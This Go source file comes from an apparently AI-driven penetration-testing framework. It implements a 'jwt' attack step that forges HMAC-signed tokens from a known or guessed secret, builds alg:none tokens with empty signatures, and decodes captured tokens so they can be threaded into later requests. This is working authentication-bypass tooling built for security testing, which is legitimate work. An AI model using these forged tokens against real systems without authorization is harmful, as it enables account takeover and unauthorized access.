package exploit

import (
	"context"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
	"time"

	"github.com/Armur-Ai/Pentest-Swarm-AI/internal/pipeline"
	"github.com/google/uuid"
)

// builtinJWT is the executor verb for JWT/token attacks (OWASP API2 broken
// authentication) — forging a signed or alg:none token, or decoding a
// captured one. Scanners cannot do this: it requires knowing/guessing a
// signing secret or exploiting a verifier that accepts alg:none, then
// threading the crafted token into a later httpreq Authorization header.
// It is handled in-process, like httpreq, rather than by shelling out to a
// jwt CLI or pulling in a JWT library — the token format is simple enough
// to hand-roll with stdlib crypto/hmac + crypto/sha256 + encoding/base64.
const builtinJWT = "jwt"

// jwtOptions is the parsed form of a `jwt` command line.
type jwtOptions struct {
	action   string // forge | none | decode
	secret   string // forge only: HMAC signing key
	alg      string // forge only: header "alg" value (default HS256); signing is always HMAC-SHA256
	claims   string // forge/none: raw JSON object for the payload
	token    string // decode only: the token to inspect
	captures []captureSpec
}

// parseJWTArgs parses the argv (excluding the leading "jwt") into jwtOptions.
func parseJWTArgs(args []string) (jwtOptions, error) {
	opts := jwtOptions{alg: "HS256"}
	for i := 0; i < len(args); i++ {
		switch args[i] {
		case "--action":
			v, err := nextArg(args, &i, "--action")
			if err != nil {
				return opts, err
			}
			opts.action = strings.ToLower(v)
		case "--secret":
			v, err := nextArg(args, &i, "--secret")
			if err != nil {
				return opts, err
			}
			opts.secret = v
		case "--alg":
			v, err := nextArg(args, &i, "--alg")
			if err != nil {
				return opts, err
			}
			opts.alg = v
		case "--claims":
			v, err := nextArg(args, &i, "--claims")
			if err != nil {
				return opts, err
			}
			opts.claims = v
		case "--token":
			v, err := nextArg(args, &i, "--token")
			if err != nil {
				return opts, err
			}
			opts.token = v
		case "--capture":
			v, err := nextArg(args, &i, "--capture")
			if err != nil {
				return opts, err
			}
			name, sel, ok := strings.Cut(v, "=")
			if !ok || name == "" || sel == "" {
				return opts, fmt.Errorf("--capture wants name=selector, got %q", v)
			}
			opts.captures = append(opts.captures, captureSpec{name: name, selector: sel})
		default:
			return opts, fmt.Errorf("unknown jwt flag %q", args[i])
		}
	}
	return opts, nil
}

// runJWT executes the jwt builtin verb. Command syntax:
//
//	jwt --action forge  --secret <s> [--alg HS256] [--claims '<json>'] [--capture name=selector]
//	jwt --action none   [--claims '<json>'] [--capture name=selector]
//	jwt --action decode --token <t> [--capture name=selector]
//
// There is no network I/O — the verb's own JSON output ({"token","header",
// "claims"}) stands in for the "response" that --capture reads from, using
// the same selector syntax as httpreq (captureFromJSON below).
func (e *Executor) runJWT(_ context.Context, parts []string, step pipeline.AttackStep, campaignID uuid.UUID, start time.Time, vars map[string]string) (*pipeline.ExecutionResult, error) {
	blocked := func(msg string) *pipeline.ExecutionResult {
		return &pipeline.ExecutionResult{
			StepID:          step.ID,
			CampaignID:      campaignID,
			CommandExecuted: step.Command,
			Output:          "BLOCKED: " + msg,
			Success:         false,
			ExecutedAt:      start,
			DurationMs:      int(time.Since(start).Milliseconds()),
		}
	}

	opts, err := parseJWTArgs(parts[1:])
	if err != nil {
		return blocked(err.Error()), fmt.Errorf("jwt: %w", err)
	}

	var (
		token  string
		header map[string]any
		claims map[string]any
	)

	switch opts.action {
	case "forge":
		if opts.secret == "" {
			return blocked("jwt --action forge requires --secret"), fmt.Errorf("jwt: missing --secret")
		}
		if claims, err = parseJWTClaims(opts.claims); err != nil {
			return blocked(err.Error()), fmt.Errorf("jwt: %w", err)
		}
		alg := opts.alg
		if alg == "" {
			alg = "HS256"
		}
		header = map[string]any{"alg": alg, "typ": "JWT"}
		headerSeg, herr := jsonB64(header)
		payloadSeg, perr := jsonB64(claims)
		if herr != nil || perr != nil {
			return blocked("encoding token: " + firstErr(herr, perr).Error()), fmt.Errorf("jwt: %w", firstErr(herr, perr))
		}
		signingInput := headerSeg + "." + payloadSeg
		mac := hmac.New(sha256.New, []byte(opts.secret))
		mac.Write([]byte(signingInput))
		token = signingInput + "." + base64.RawURLEncoding.EncodeToString(mac.Sum(nil))

	case "none":
		if claims, err = parseJWTClaims(opts.claims); err != nil {
			return blocked(err.Error()), fmt.Errorf("jwt: %w", err)
		}
		header = map[string]any{"alg": "none", "typ": "JWT"}
		headerSeg, herr := jsonB64(header)
		payloadSeg, perr := jsonB64(claims)
		if herr != nil || perr != nil {
			return blocked("encoding token: " + firstErr(herr, perr).Error()), fmt.Errorf("jwt: %w", firstErr(herr, perr))
		}
		// The classic alg-confusion forge: an empty signature segment, which
		// some verifiers accept because they trust the header's own alg field.
		token = headerSeg + "." + payloadSeg + "."

	case "decode":
		if opts.token == "" {
			return blocked("jwt --action decode requires --token"), fmt.Errorf("jwt: missing --token")
		}
		segs := strings.SplitN(opts.token, ".", 3)
		if len(segs) < 2 {
			return blocked("jwt --action decode: token has fewer than 2 segments"), fmt.Errorf("jwt: malformed token")
		}
		if header, err = decodeJWTSegment(segs[0]); err != nil {
			return blocked("decoding header: " + err.Error()), fmt.Errorf("jwt: %w", err)
		}
		if claims, err = decodeJWTSegment(segs[1]); err != nil {
			return blocked("decoding payload: " + err.Error()), fmt.Errorf("jwt: %w", err)
		}
		token = opts.token

	default:
		return blocked(fmt.Sprintf("unknown --action %q (want forge|none|decode)", opts.action)), fmt.Errorf("jwt: bad action")
	}

	outJSON, merr := json.Marshal(struct {
		Token  string         `json:"token"`
		Header map[string]any `json:"header"`
		Claims map[string]any `json:"claims"`
	}{Token: token, Header: header, Claims: claims})
	if merr != nil {
		return blocked("encoding result: " + merr.Error()), fmt.Errorf("jwt: %w", merr)
	}

	if vars != nil {
		for _, c := range opts.captures {
			if v, ok := captureFromJSON(c.selector, outJSON); ok {
				vars[c.name] = v
			}
		}
	}

	return &pipeline.ExecutionResult{
		StepID:          step.ID,
		CampaignID:      campaignID,
		CommandExecuted: step.Command,
		Output:          fmt.Sprintf("jwt --action %s\n%s", opts.action, string(outJSON)),
		Success:         true,
		ExecutedAt:      start,
		DurationMs:      int(time.Since(start).Milliseconds()),
		Evidence: []pipeline.Evidence{{
			Type:        "jwt_token",
			Content:     string(outJSON),
			Timestamp:   time.Now(),
			Description: fmt.Sprintf("jwt --action %s", opts.action),
		}},
	}, nil
}

// parseJWTClaims parses --claims into a JSON object, defaulting to an empty
// object when omitted so forge/none work without a payload.
func parseJWTClaims(raw string) (map[string]any, error) {
	if strings.TrimSpace(raw) == "" {
		return map[string]any{}, nil
	}
	var claims map[string]any
	if err := json.Unmarshal([]byte(raw), &claims); err != nil {
		return nil, fmt.Errorf("--claims must be a JSON object: %w", err)
	}
	return claims, nil
}

// jsonB64 marshals v and base64url-encodes it without padding, per the JWT spec.
func jsonB64(v any) (string, error) {
	b, err := json.Marshal(v)
	if err != nil {
		return "", err
	}
	return base64.RawURLEncoding.EncodeToString(b), nil
}

// decodeJWTSegment base64url-decodes a JWT header/payload segment and parses
// it as a JSON object. It tolerates both the unpadded encoding the spec
// requires and a padded/standard variant some hand-built tokens use.
func decodeJWTSegment(seg string) (map[string]any, error) {
	b, err := base64.RawURLEncoding.DecodeString(seg)
	if err != nil {
		if b2, err2 := base64.URLEncoding.DecodeString(seg); err2 == nil {
			b = b2
		} else {
			return nil, err
		}
	}
	var m map[string]any
	if err := json.Unmarshal(b, &m); err != nil {
		return nil, err
	}
	return m, nil
}

// captureFromJSON extracts a value from the jwt verb's own JSON output using
// the JSON-path half of httpreq's captureValue selector syntax. There is no
// HTTP response to back a "header:" selector, so one is simply reported as
// not found rather than passed through to captureValue (which would
// dereference a nil *http.Response).
func captureFromJSON(selector string, body []byte) (string, bool) {
	if strings.HasPrefix(selector, "header:") {
		return "", false
	}
	return captureValue(selector, nil, body)
}

// firstErr returns the first non-nil error, for reporting one failure out of
// two independent operations that can each fail.
func firstErr(errs ...error) error {
	for _, e := range errs {
		if e != nil {
			return e
		}
	}
	return nil
}
